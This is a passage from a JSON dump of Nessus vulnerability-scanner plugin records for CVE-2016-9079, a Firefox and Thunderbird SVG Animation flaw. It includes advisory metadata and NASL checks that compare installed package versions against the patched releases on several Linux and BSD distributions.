script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2850\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"thunderbird-45.5.1-1.el5_11\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"thunderbird-45.5.1-1.el5_11\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"thunderbird-debuginfo-45.5.1-1.el5_11\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-45.5.1-1.el5_11\", allowmaj:TRUE)) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-45.5.1-1.el6_8\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-45.5.1-1.el6_8\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-45.5.1-1.el6_8\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-debuginfo-45.5.1-1.el6_8\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-debuginfo-45.5.1-1.el6_8\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-45.5.1-1.el6_8\", allowmaj:TRUE)) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"thunderbird-45.5.1-1.el7_3\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-45.5.1-1.el7_3\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:52", "description": "This update contains Mozilla Thunderbird 45.5.1 and fixes one vulnerability.\n\nIn Mozilla Thunderbird, this vulnerability may be exploited when used in a browser-like context.\n\n - CVE-2016-9079: SVG Animation Remote Code Execution (MFSA 2016-92, bsc#1012964, bmo#1321066)", "cvss3": {}, "published": "2016-12-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Mozilla Thunderbird (openSUSE-2016-1393)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaThunderbird", "p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource", "p-cpe:/a:novell:opensuse:MozillaThunderbird-devel", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2016-1393.NASL", "href": "https://www.tenable.com/plugins/nessus/95553", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1393.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95553);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-9079\");\n\n script_name(english:\"openSUSE Security Update : Mozilla Thunderbird (openSUSE-2016-1393)\");\n script_summary(english:\"Check for the openSUSE-2016-1393 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains Mozilla Thunderbird 45.5.1 and fixes one\nvulnerability.\n\nIn Mozilla Thunderbird, this vulnerability may be exploited when used\nin a browser-like context.\n\n - CVE-2016-9079: SVG Animation Remote Code Execution (MFSA\n 2016-92, bsc#1012964, bmo#1321066)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012964\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Mozilla Thunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-45.5.1-55.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-buildsymbols-45.5.1-55.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-debuginfo-45.5.1-55.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-debugsource-45.5.1-55.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-devel-45.5.1-55.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-translations-common-45.5.1-55.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaThunderbird-translations-other-45.5.1-55.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"MozillaThunderbird-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"MozillaThunderbird-buildsymbols-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"MozillaThunderbird-debuginfo-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"MozillaThunderbird-debugsource-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"MozillaThunderbird-devel-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"MozillaThunderbird-translations-common-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"MozillaThunderbird-translations-other-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaThunderbird-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaThunderbird-buildsymbols-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaThunderbird-debuginfo-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaThunderbird-debugsource-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaThunderbird-devel-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaThunderbird-translations-common-45.5.1-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaThunderbird-translations-other-45.5.1-28.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaThunderbird / MozillaThunderbird-buildsymbols / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:00", "description": "An update for thunderbird is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : thunderbird (CESA-2016:2850)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:thunderbird", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2016-2850.NASL", "href": "https://www.tenable.com/plugins/nessus/95576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2850 and \n# CentOS Errata and Security Advisory 2016:2850 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95576);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"RHSA\", value:\"2016:2850\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : thunderbird (CESA-2016:2850)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for thunderbird is now available for Red Hat Enterprise\nLinux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web\npage containing malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Thunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this\nissue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-December/022169.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?367d542b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-December/022170.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b2d702b0\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2016-December/003714.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?601ec38c\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9079\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"thunderbird-45.5.1-1.el5.centos\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"thunderbird-45.5.1-1.el6.centos\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"thunderbird-45.5.1-1.el7.centos\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:43", "description": "New mozilla-firefox packages are available for Slackware 14.1, 14.2, and -current to fix security issues.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Slackware 14.1 / 14.2 / current : mozilla-firefox (SSA:2016-336-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:mozilla-firefox", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2016-336-01.NASL", "href": "https://www.tenable.com/plugins/nessus/95442", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-336-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95442);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"SSA\", value:\"2016-336-01\");\n\n script_name(english:\"Slackware 14.1 / 14.2 / current : mozilla-firefox (SSA:2016-336-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mozilla-firefox packages are available for Slackware 14.1, 14.2,\nand -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.403767\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a3e6217\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mozilla-firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mozilla-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", pkgname:\"mozilla-firefox\", pkgver:\"45.5.1esr\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mozilla-firefox\", pkgver:\"45.5.1esr\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"mozilla-firefox\", pkgver:\"45.5.1esr\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"mozilla-firefox\", pkgver:\"45.5.1esr\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"mozilla-firefox\", pkgver:\"50.0.2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mozilla-firefox\", pkgver:\"50.0.2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:49", "description": "The Mozilla Foundation reports :\n\nA use-after-free vulnerability in SVG Animation has been discovered.\nAn exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "FreeBSD : Mozilla -- SVG Animation Remote Code Execution (18f39fb6-7400-4063-acaf-0806e92c094f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:firefox", "p-cpe:/a:freebsd:freebsd:firefox-esr", "p-cpe:/a:freebsd:freebsd:libxul", "p-cpe:/a:freebsd:freebsd:linux-firefox", "p-cpe:/a:freebsd:freebsd:linux-seamonkey", "p-cpe:/a:freebsd:freebsd:linux-thunderbird", "p-cpe:/a:freebsd:freebsd:seamonkey", "p-cpe:/a:freebsd:freebsd:thunderbird", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_18F39FB674004063ACAF0806E92C094F.NASL", "href": "https://www.tenable.com/plugins/nessus/95450", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE 